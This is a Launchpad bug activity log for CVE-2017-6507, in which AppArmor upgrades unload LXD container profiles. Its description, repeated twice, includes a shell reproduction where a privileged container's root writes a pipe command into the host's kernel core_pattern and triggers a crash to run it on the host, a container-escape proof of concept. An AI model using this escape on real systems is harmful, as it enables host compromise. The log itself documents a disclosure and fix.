2017-03-01 08:39:05 |
Stéphane Graber |
bug |
|
|
added bug |
2017-03-01 08:41:10 |
Stéphane Graber |
bug |
|
|
added subscriber Ubuntu Container Security team |
2017-03-03 23:21:24 |
Tyler Hicks |
apparmor (Ubuntu): status |
New |
In Progress |
|
2017-03-03 23:21:30 |
Tyler Hicks |
apparmor (Ubuntu): assignee |
|
Tyler Hicks (tyhicks) |
|
2017-03-08 00:43:07 |
Tyler Hicks |
cve linked |
|
2017-6507 |
|
2017-03-11 00:13:31 |
Tyler Hicks |
bug task added |
|
apparmor |
|
2017-03-11 00:13:39 |
Tyler Hicks |
apparmor: status |
New |
In Progress |
|
2017-03-11 00:13:42 |
Tyler Hicks |
apparmor: importance |
Undecided |
Critical |
|
2017-03-11 00:13:44 |
Tyler Hicks |
apparmor: assignee |
|
Tyler Hicks (tyhicks) |
|
2017-03-11 00:15:11 |
Tyler Hicks |
attachment added |
|
0001-parser-Preserve-unknown-profiles-when-restarting-app.patch https://bugs.launchpad.net/apparmor/+bug/1668892/+attachment/4835672/+files/0001-parser-Preserve-unknown-profiles-when-restarting-app.patch |
|
2017-03-11 00:16:43 |
Tyler Hicks |
attachment added |
|
0002-utils-Add-aa-remove-unknown-utility-to-unload-unknow.patch https://bugs.launchpad.net/apparmor/+bug/1668892/+attachment/4835673/+files/0002-utils-Add-aa-remove-unknown-utility-to-unload-unknow.patch |
|
2017-03-11 00:16:52 |
Tyler Hicks |
bug |
|
|
added subscriber Tyler Hicks |
2017-03-16 16:10:27 |
Christian Brauner |
bug |
|
|
added subscriber Christian Brauner |
2017-03-16 16:15:41 |
Christian Brauner |
bug |
|
|
added subscriber Jon Grimm |
2017-03-17 13:12:47 |
Tyler Hicks |
bug |
|
|
added subscriber intrigeri |
2017-03-23 22:48:59 |
Tyler Hicks |
summary |
apparmor package upgrades unload all LXD profiles |
apparmor package upgrades unload privately managed profiles |
|
2017-03-23 22:49:22 |
Tyler Hicks |
summary |
apparmor package upgrades unload privately managed profiles |
CVE-2017-6507: apparmor package upgrades unload privately managed profiles |
|
2017-03-23 22:55:27 |
Tyler Hicks |
description |
Apparmor package upgrades unloads all LXD apparmor profiles, making all LXD containers unconfined.
Example:
# Create an unprivileged and a privileged container
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c1
Creating c1
Starting c1
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c2 -c security.privileged=true
Creating c2
Starting c2
# Look at their apparmor profiles (expected values)
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c1_</var/lib/lxd>//&:lxd-c1_<var-lib-lxd>://unconfined (enforce)
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c2_</var/lib/lxd>//&:lxd-c2_<var-lib-lxd>://unconfined (enforce)
# Apply an apparmor upgrade
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ sudo apt upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
apparmor
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 493 kB of archives.
After this operation, 8,192 B of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://us.archive.ubuntu.com/ubuntu zesty/main amd64 apparmor amd64 2.11.0-2ubuntu1 [493 kB]
Fetched 493 kB in 0s (34.9 MB/s)
Preconfiguring packages ...
(Reading database ... 221457 files and directories currently installed.)
Preparing to unpack .../apparmor_2.11.0-2ubuntu1_amd64.deb ...
Unpacking apparmor (2.11.0-2ubuntu1) over (2.10.95-4ubuntu5.1) ...
Processing triggers for ureadahead (0.100.0-19) ...
Setting up apparmor (2.11.0-2ubuntu1) ...
Installing new version of config file /etc/apparmor.d/abstractions/X ...
Installing new version of config file /etc/apparmor.d/abstractions/authentication ...
Installing new version of config file /etc/apparmor.d/abstractions/base ...
Installing new version of config file /etc/apparmor.d/abstractions/dbus-session-strict ...
Installing new version of config file /etc/apparmor.d/abstractions/gnome ...
Installing new version of config file /etc/apparmor.d/abstractions/nameservice ...
Installing new version of config file /etc/apparmor.d/abstractions/php5 ...
Installing new version of config file /etc/apparmor.d/abstractions/samba ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_certs ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_keys ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-browsers ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-helpers ...
Installing new version of config file /etc/apparmor.d/abstractions/user-mail ...
update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
Skipping profile in /etc/apparmor.d/disable: usr.sbin.sssd
Processing triggers for systemd (232-18ubuntu1) ...
Processing triggers for man-db (2.7.6.1-1) ...
# And look at the now unconfined containers
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c1_<var-lib-lxd>://unconfined
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c2_<var-lib-lxd>://unconfined
# The LXD profiles are also entirely gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls /sys/kernel/security/apparmor/policy/profiles/ | grep lxd
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$
# And to confirm that apparmor is in fact gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc exec c2 bash
root@c2:~# mount -t proc proc /mnt
root@c2:~# echo "|/usr/bin/touch /pwned" > /mnt/sys/kernel/core_pattern
root@c2:~# sleep 30&
[1] 468
root@c2:~# kill -SIGSEGV $!
root@c2:~#
[1]+ Segmentation fault (core dumped) sleep 30
root@c2:~# exit
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls -lh /pwned
-rw-rw-rw- 1 root root 0 Mar 1 03:37 /pwned
This was originally reported (though not as a security issue) here: https://github.com/lxc/lxd/issues/2981 |
Restarting the apparmor init script, upstart job, or systemd service has historically removed all loaded profiles unknown to the well-known profile locations. In upstream AppArmor terms, this is /etc/apparmor.d/ but Ubuntu also adds additional locations.
This behavior has previously caused a problem where libvirt-managed profiles would be unloaded upon "restarting AppArmor":
https://launchpad.net/bugs/702774
Stéphane Graber created this bug report after he noticed that the same behavior was causing similar problems with lxd-manager profiles.
In addition, AppArmor distro packaging may trigger an "AppArmor restart" when installing a new version of AppArmor, resulting in the same profile removal problem. This is true for the Debian/Ubuntu packaging.
The upstream AppArmor team has decided to remove this functionality from the AppArmor restart logic to prevent a similar issue happening with the next external project that needs to privately manage their own set of AppArmor profiles.
=== Original Bug Report ===
Apparmor package upgrades unloads all LXD apparmor profiles, making all LXD containers unconfined.
Example:
# Create an unprivileged and a privileged container
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c1
Creating c1
Starting c1
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc launch ubuntu:16.04 c2 -c security.privileged=true
Creating c2
Starting c2
# Look at their apparmor profiles (expected values)
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c1_</var/lib/lxd>//&:lxd-c1_<var-lib-lxd>://unconfined (enforce)
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
lxd-c2_</var/lib/lxd>//&:lxd-c2_<var-lib-lxd>://unconfined (enforce)
# Apply an apparmor upgrade
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ sudo apt upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
apparmor
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 493 kB of archives.
After this operation, 8,192 B of additional disk space will be used.
Do you want to continue? [Y/n]
Get:1 http://us.archive.ubuntu.com/ubuntu zesty/main amd64 apparmor amd64 2.11.0-2ubuntu1 [493 kB]
Fetched 493 kB in 0s (34.9 MB/s)
Preconfiguring packages ...
(Reading database ... 221457 files and directories currently installed.)
Preparing to unpack .../apparmor_2.11.0-2ubuntu1_amd64.deb ...
Unpacking apparmor (2.11.0-2ubuntu1) over (2.10.95-4ubuntu5.1) ...
Processing triggers for ureadahead (0.100.0-19) ...
Setting up apparmor (2.11.0-2ubuntu1) ...
Installing new version of config file /etc/apparmor.d/abstractions/X ...
Installing new version of config file /etc/apparmor.d/abstractions/authentication ...
Installing new version of config file /etc/apparmor.d/abstractions/base ...
Installing new version of config file /etc/apparmor.d/abstractions/dbus-session-strict ...
Installing new version of config file /etc/apparmor.d/abstractions/gnome ...
Installing new version of config file /etc/apparmor.d/abstractions/nameservice ...
Installing new version of config file /etc/apparmor.d/abstractions/php5 ...
Installing new version of config file /etc/apparmor.d/abstractions/samba ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_certs ...
Installing new version of config file /etc/apparmor.d/abstractions/ssl_keys ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-browsers ...
Installing new version of config file /etc/apparmor.d/abstractions/ubuntu-helpers ...
Installing new version of config file /etc/apparmor.d/abstractions/user-mail ...
update-rc.d: warning: start and stop actions are no longer supported; falling back to defaults
Skipping profile in /etc/apparmor.d/disable: usr.sbin.rsyslogd
Skipping profile in /etc/apparmor.d/disable: usr.sbin.sssd
Processing triggers for systemd (232-18ubuntu1) ...
Processing triggers for man-db (2.7.6.1-1) ...
# And look at the now unconfined containers
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c1 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c1_<var-lib-lxd>://unconfined
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ cat /proc/$(lxc info c2 | grep Pid | sed "s/Pid: //g")/attr/current
unconfined//&:lxd-c2_<var-lib-lxd>://unconfined
# The LXD profiles are also entirely gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls /sys/kernel/security/apparmor/policy/profiles/ | grep lxd
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$
# And to confirm that apparmor is in fact gone
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ lxc exec c2 bash
root@c2:~# mount -t proc proc /mnt
root@c2:~# echo "|/usr/bin/touch /pwned" > /mnt/sys/kernel/core_pattern
root@c2:~# sleep 30&
[1] 468
root@c2:~# kill -SIGSEGV $!
root@c2:~#
[1]+ Segmentation fault (core dumped) sleep 30
root@c2:~# exit
stgraber@dakara:~/data/code/lxc/lxd (stgraber/master)$ ls -lh /pwned
-rw-rw-rw- 1 root root 0 Mar 1 03:37 /pwned
This was originally reported (though not as a security issue) here: https://github.com/lxc/lxd/issues/2981 |
|
2017-03-23 22:57:01 |
Tyler Hicks |
information type |
Private Security |
Public Security |
|
2017-03-23 23:03:31 |
Tyler Hicks |
summary |
CVE-2017-6507: apparmor package upgrades unload privately managed profiles |
CVE-2017-6507: apparmor service restarts and package upgrades unload privately managed profiles |
|
2017-03-24 00:26:47 |
Ubuntu Foundations Team Bug Bot |
tags |
|
patch |
|
2017-03-24 05:09:19 |
Launchpad Janitor |
branch linked |
|
lp:apparmor |
|
2017-03-24 05:12:01 |
Tyler Hicks |
apparmor: status |
In Progress |
Fix Committed |
|
2017-03-24 05:12:11 |
Tyler Hicks |
apparmor: milestone |
|
2.12 |
|
2017-03-24 06:16:41 |
Launchpad Janitor |
branch linked |
|
lp:~apparmor-dev/apparmor/apparmor-ubuntu-citrain |
|
2017-03-24 09:35:18 |
Launchpad Janitor |
apparmor (Ubuntu): status |
In Progress |
Fix Released |
|
2017-03-24 17:44:17 |
Launchpad Janitor |
branch linked |
|
lp:apparmor/2.10 |
|
2017-03-24 17:46:32 |
Launchpad Janitor |
branch linked |
|
lp:apparmor/2.9 |
|
2017-03-24 18:01:30 |
Christian Boltz |
nominated for series |
|
apparmor/2.10 |
|
2017-03-24 18:01:30 |
Christian Boltz |
bug task added |
|
apparmor/2.10 |
|
2017-03-24 18:01:30 |
Christian Boltz |
nominated for series |
|
apparmor/2.11 |
|
2017-03-24 18:01:30 |
Christian Boltz |
bug task added |
|
apparmor/2.11 |
|
2017-03-24 18:01:45 |
Christian Boltz |
apparmor/2.10: milestone |
|
2.11.1 |
|
2017-03-24 18:01:49 |
Christian Boltz |
apparmor/2.10: status |
New |
Fix Committed |
|
2017-03-24 18:01:52 |
Christian Boltz |
apparmor/2.11: status |
New |
Fix Committed |
|
2017-03-24 18:01:59 |
Christian Boltz |
apparmor/2.11: milestone |
|
2.11.1 |
|
2017-03-24 18:02:07 |
Christian Boltz |
apparmor/2.10: milestone |
2.11.1 |
2.10.3 |
|
2017-03-24 18:02:23 |
Christian Boltz |
nominated for series |
|
apparmor/2.9 |
|
2017-03-24 18:02:23 |
Christian Boltz |
bug task added |
|
apparmor/2.9 |
|
2017-03-24 18:02:30 |
Christian Boltz |
apparmor/2.9: milestone |
|
2.9.5 |
|
2017-03-24 18:02:34 |
Christian Boltz |
apparmor/2.9: status |
New |
Fix Committed |
|
2017-03-28 23:08:15 |
paz |
bug |
|
|
added subscriber paz |
2017-10-19 09:34:24 |
John Johansen |
apparmor: status |
Fix Committed |
Won't Fix |
|
2017-10-19 09:34:30 |
John Johansen |
apparmor: status |
Won't Fix |
Fix Committed |
|
2017-10-19 09:34:35 |
John Johansen |
apparmor/2.10: status |
Fix Committed |
Fix Released |
|
2017-10-19 09:34:40 |
John Johansen |
apparmor/2.11: status |
Fix Committed |
Fix Released |
|
2017-10-19 09:34:45 |
John Johansen |
apparmor/2.9: status |
Fix Committed |
Fix Released |
|
2018-04-22 11:27:01 |
Christian Boltz |
apparmor: status |
Fix Committed |
Fix Released |
|
2019-11-08 16:01:54 |
juan serven |
apparmor: assignee |
Tyler Hicks (tyhicks) |
juan serven (juanserven) |
|